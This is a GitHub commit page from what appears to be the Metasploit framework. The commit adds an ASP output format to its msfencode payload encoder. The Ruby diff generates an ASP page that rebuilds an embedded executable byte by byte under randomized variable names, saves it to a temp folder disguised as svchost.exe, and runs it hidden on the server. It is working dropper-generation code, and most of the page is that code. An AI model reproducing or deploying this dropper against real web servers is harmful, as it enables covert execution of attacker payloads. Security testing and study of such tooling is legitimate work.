Permalink
Browse files

Add -t asp to msfencode :)

git-svn-id: file:///home/svn/framework3/trunk@8013 4d416f70-5f16-0410-b530-b9f4589650da
  • Loading branch information...
1 parent 1f2c1e7 commit 1d1f94593ce05b2f6d1007e95aed561513b28d1c HD Moore committed Dec 28, 2009
Showing with 71 additions and 3 deletions.
  1. +59 −0 lib/msf/util/exe.rb
  2. +12 −3 msfencode
View
@@ -506,10 +506,69 @@ def self.to_exe_vbs(exes = '', opts={})
vbs
end
+ def self.to_exe_asp(exes = '', opts={})
+ exe = exes.unpack('C*')
+ vbs = "<%\r\n"
+
+ var_bytes = Rex::Text.rand_text_alpha(rand(4)+4) # repeated a large number of times, so keep this one small
+ var_fname = Rex::Text.rand_text_alpha(rand(8)+8)
+ var_func = Rex::Text.rand_text_alpha(rand(8)+8)
+ var_stream = Rex::Text.rand_text_alpha(rand(8)+8)
+ var_obj = Rex::Text.rand_text_alpha(rand(8)+8)
+ var_shell = Rex::Text.rand_text_alpha(rand(8)+8)
+ var_tempdir = Rex::Text.rand_text_alpha(rand(8)+8)
+ var_tempexe = Rex::Text.rand_text_alpha(rand(8)+8)
+ var_basedir = Rex::Text.rand_text_alpha(rand(8)+8)
+
+ vbs << "Sub #{var_func}()\r\n"
+
+ vbs << "#{var_bytes}=Chr(#{exe[0]})"
+
+ lines = []
+ 1.upto(exe.length-1) do |byte|
+ if(byte % 100 == 0)
+ lines.push "\r\n#{var_bytes}=#{var_bytes}"
+ end
+ # exe is an Array of bytes, not a String, thanks to the unpack
+ # above, so the following line is not subject to the different
+ # treatments of String#[] between ruby 1.8 and 1.9
+ lines.push "&Chr(#{exe[byte]})"
+ end
+ vbs << lines.join("") + "\r\n"
+
+ vbs << "Dim #{var_obj}\r\n"
+ vbs << "Set #{var_obj} = CreateObject(\"Scripting.FileSystemObject\")\r\n"
+ vbs << "Dim #{var_stream}\r\n"
+ vbs << "Dim #{var_tempdir}\r\n"
+ vbs << "Dim #{var_tempexe}\r\n"
+ vbs << "Dim #{var_basedir}\r\n"
+ vbs << "Set #{var_tempdir} = #{var_obj}.GetSpecialFolder(2)\r\n"
+
+ vbs << "#{var_basedir} = #{var_tempdir} & \"\\\" & #{var_obj}.GetTempName()\r\n"
+ vbs << "#{var_obj}.CreateFolder(#{var_basedir})\r\n"
+ vbs << "#{var_tempexe} = #{var_basedir} & \"\\\" & \"svchost.exe\"\r\n"
+ vbs << "Set #{var_stream} = #{var_obj}.CreateTextFile(#{var_tempexe},2,0)\r\n"
+ vbs << "#{var_stream}.Write #{var_bytes}\r\n"
+ vbs << "#{var_stream}.Close\r\n"
+ vbs << "Dim #{var_shell}\r\n"
+ vbs << "Set #{var_shell} = CreateObject(\"Wscript.Shell\")\r\n"
+
+ vbs << "#{var_shell}.run #{var_tempexe}, 0, false\r\n"
+ vbs << "End Sub\r\n"
+
+ vbs << "#{var_func}\r\n"
+ vbs << "%>\r\n"
+ vbs
+ end
+
def self.to_win32pe_vbs(framework, code, opts={})
to_exe_vbs(to_win32pe(framework, code, opts), opts)
end
+ def self.to_win32pe_asp(framework, code, opts={})
+ to_exe_asp(to_win32pe(framework, code, opts), opts)
+ end
+
# Creates a .NET DLL which loads data into memory
# at a specified location with read/execute permissions
# - the data will be loaded at: base+0x2065
View
@@ -20,7 +20,7 @@ $args = Rex::Parser::Arguments.new(
"-m" => [ true, "Specifies an additional module search path" ],
"-a" => [ true, "The architecture to encode as" ],
"-p" => [ true, "The platform to encode for" ],
- "-t" => [ true, "The format to display the encoded buffer with (c, elf, exe, java, perl, raw, ruby, vba, vbs, loop-vbs)" ],
+ "-t" => [ true, "The format to display the encoded buffer with (c, elf, exe, java, perl, raw, ruby, vba, vbs, loop-vbs, asp)" ],
"-b" => [ true, "The list of characters to avoid: '\\x00\\xff'" ],
"-s" => [ true, "The maximum size of the encoded data" ],
"-e" => [ true, "The encoder to use" ],
@@ -124,7 +124,7 @@ $args.parse(ARGV) { |opt, idx, val|
when "-s"
space = val.to_i
when "-t"
- if (val =~ /^(perl|ruby|rb|raw|c|js_le|js_be|java|exe|exe-small|elf|vba|vbs|loop-vbs)$/)
+ if (val =~ /^(perl|ruby|rb|raw|c|js_le|js_be|java|exe|exe-small|elf|vba|vbs|loop-vbs|asp)$/)
fmt = val
else
$stderr.puts(OutError + "Invalid format: #{val}")
@@ -228,7 +228,7 @@ case cmd
if(not arch or (arch.index(ARCH_X86)))
exe = Msf::Util::EXE.to_win32pe_old($framework, raw)
end
-
+
if(not output)
$stdout.write(exe)
else
@@ -273,6 +273,15 @@ case cmd
fd.write(vbs)
end
end
+ when 'asp'
+ asp = Msf::Util::EXE.to_win32pe_asp($framework, raw, {:persist => false, :template => altexe})
+ if(not output)
+ $stdout.write(asp)
+ else
+ File.open(output, "wb") do |fd|
+ fd.write(asp)
+ end
+ end
else
fmt ||= "ruby"
if(not output)

0 comments on commit 1d1f945

Please sign in to comment.